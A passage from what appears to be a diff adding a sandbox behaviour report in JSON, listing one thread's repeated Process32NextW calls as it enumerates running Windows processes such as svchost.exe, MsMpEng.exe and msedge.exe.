"0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2580" + } + ], + "repeated": 0, + "id": 1581 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2608" + } + ], + "repeated": 0, + "id": 1582 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2732" + } + ], + "repeated": 0, + "id": 1583 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2756" + } + ], + "repeated": 0, + "id": 1584 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2772" + } + ], + "repeated": 0, + "id": 1585 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MsMpEng.exe" + }, + { + "name": "ProcessId", + "value": "2780" + } + ], + "repeated": 0, + "id": 1586 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2892" + } + ], + "repeated": 0, + "id": 1587 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3004" + } + ], + "repeated": 0, + "id": 1588 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3216" + } + ], + "repeated": 0, + "id": 1589 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3544" + } + ], + "repeated": 0, + "id": 1590 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sihost.exe" + }, + { + "name": "ProcessId", + "value": "3724" + } + ], + "repeated": 0, + "id": 1591 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3740" + } + ], + "repeated": 0, + "id": 1592 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3768" + } + ], + "repeated": 0, + "id": 1593 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3868" + } + ], + "repeated": 0, + "id": 1594 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3928" + } + ], + "repeated": 0, + "id": 1595 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3940" + } + ], + "repeated": 0, + "id": 1596 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4056" + } + ], + "repeated": 0, + "id": 1597 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ctfmon.exe" + }, + { + "name": "ProcessId", + "value": "1564" + } + ], + "repeated": 0, + "id": 1598 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4132" + } + ], + "repeated": 0, + "id": 1599 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "explorer.exe" + }, + { + "name": "ProcessId", + "value": "4248" + } + ], + "repeated": 0, + "id": 1600 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4372" + } + ], + "repeated": 0, + "id": 1601 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4432" + } + ], + "repeated": 0, + "id": 1602 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4812" + } + ], + "repeated": 0, + "id": 1603 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4908" + } + ], + "repeated": 0, + "id": 1604 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4936" + } + ], + "repeated": 0, + "id": 1605 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "StartMenuExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "3508" + } + ], + "repeated": 0, + "id": 1606 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4712" + } + ], + "repeated": 0, + "id": 1607 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5144" + } + ], + "repeated": 0, + "id": 1608 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchApp.exe" + }, + { + "name": "ProcessId", + "value": "5324" + } + ], + "repeated": 0, + "id": 1609 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "5444" + } + ], + "repeated": 0, + "id": 1610 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchIndexer.exe" + }, + { + "name": "ProcessId", + "value": "5456" + } + ], + "repeated": 0, + "id": 1611 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5876" + } + ], + "repeated": 0, + "id": 1612 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smartscreen.exe" + }, + { + "name": "ProcessId", + "value": "6068" + } + ], + "repeated": 0, + "id": 1613 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthSystray.exe" + }, + { + "name": "ProcessId", + "value": "6108" + } + ], + "repeated": 0, + "id": 1614 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthService.exe" + }, + { + "name": "ProcessId", + "value": "5216" + } + ], + "repeated": 0, + "id": 1615 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6468" + } + ], + "repeated": 0, + "id": 1616 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7000" + } + ], + "repeated": 0, + "id": 1617 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ApplicationFrameHost.exe" + }, + { + "name": "ProcessId", + "value": "7132" + } + ], + "repeated": 0, + "id": 1618 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6384" + } + ], + "repeated": 0, + "id": 1619 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7592" + } + ], + "repeated": 0, + "id": 1620 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7620" + } + ], + "repeated": 0, + "id": 1621 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "audiodg.exe" + }, + { + "name": "ProcessId", + "value": "7760" + } + ], + "repeated": 0, + "id": 1622 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ShellExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "7964" + } + ], + "repeated": 0, + "id": 1623 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8048" + } + ], + "repeated": 0, + "id": 1624 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TextInputHost.exe" + }, + { + "name": "ProcessId", + "value": "7716" + } + ], + "repeated": 0, + "id": 1625 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "812" + } + ], + "repeated": 0, + "id": 1626 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WinStore.App.exe" + }, + { + "name": "ProcessId", + "value": "7444" + } + ], + "repeated": 0, + "id": 1627 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4772" + } + ], + "repeated": 0, + "id": 1628 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7408" + } + ], + "repeated": 0, + "id": 1629 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "7736" + } + ], + "repeated": 0, + "id": 1630 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6580" + } + ], + "repeated": 0, + "id": 1631 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6536" + } + ], + "repeated": 0, + "id": 1632 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchProtocolHost.exe" + }, + { + "name": "ProcessId", + "value": "2148" + } + ], + "repeated": 0, + "id": 1633 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "1592" + } + ], + "repeated": 0, + "id": 1634 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6316" + } + ], + "repeated": 0, + "id": 1635 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SgrmBroker.exe" + }, + { + "name": "ProcessId", + "value": "3540" + } + ], + "repeated": 0, + "id": 1636 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4160" + } + ], + "repeated": 0, + "id": 1637 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6388" + } + ], + "repeated": 0, + "id": 1638 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7140" + } + ], + "repeated": 0, + "id": 1639 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msiexec.exe" + }, + { + "name": "ProcessId", + "value": "6840" + } + ], + "repeated": 0, + "id": 1640 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7556" + } + ], + "repeated": 0, + "id": 1641 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "364" + } + ], + "repeated": 0, + "id": 1642 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7904" + } + ], + "repeated": 0, + "id": 1643 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1888" + } + ], + "repeated": 0, + "id": 1644 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3788" + } + ], + "repeated": 0, + "id": 1645 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1876" + } + ], + "repeated": 0, + "id": 1646 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pyw.exe" + }, + { + "name": "ProcessId", + "value": "3876" + } + ], + "repeated": 0, + "id": 1647 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pythonw.exe" + }, + { + "name": "ProcessId", + "value": "4696" + } + ], + "repeated": 0, + "id": 1648 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "6080" + } + ], + "repeated": 0, + "id": 1649 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3492" + } + ], + "repeated": 0, + "id": 1650 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "7488" + } + ], + "repeated": 0, + "id": 1651 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6344" + } + ], + "repeated": 0, + "id": 1652 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TrustedInstaller.exe" + }, + { + "name": "ProcessId", + "value": "4624" + } + ], + "repeated": 0, + "id": 1653 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4512" + } + ], + "repeated": 0, + "id": 1654 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TiWorker.exe" + }, + { + "name": "ProcessId", + "value": "6300" + } + ], + "repeated": 0, + "id": 1655 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeApp.exe" + }, + { + "name": "ProcessId", + "value": "2636" + } + ], + "repeated": 0, + "id": 1656 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WMIADAP.exe" + }, + { + "name": "ProcessId", + "value": "396" + } + ], + "repeated": 0, + "id": 1657 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "conhost.exe" + }, + { + "name": "ProcessId", + "value": "8172" + } + ], + "repeated": 0, + "id": 1658 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "5748" + } + ], + "repeated": 0, + "id": 1659 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MoUsoCoreWorker.exe" + }, + { + "name": "ProcessId", + "value": "8112" + } + ], + "repeated": 0, + "id": 1660 + }, + { + "timestamp": "2025-03-07 22:34:16,250", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": 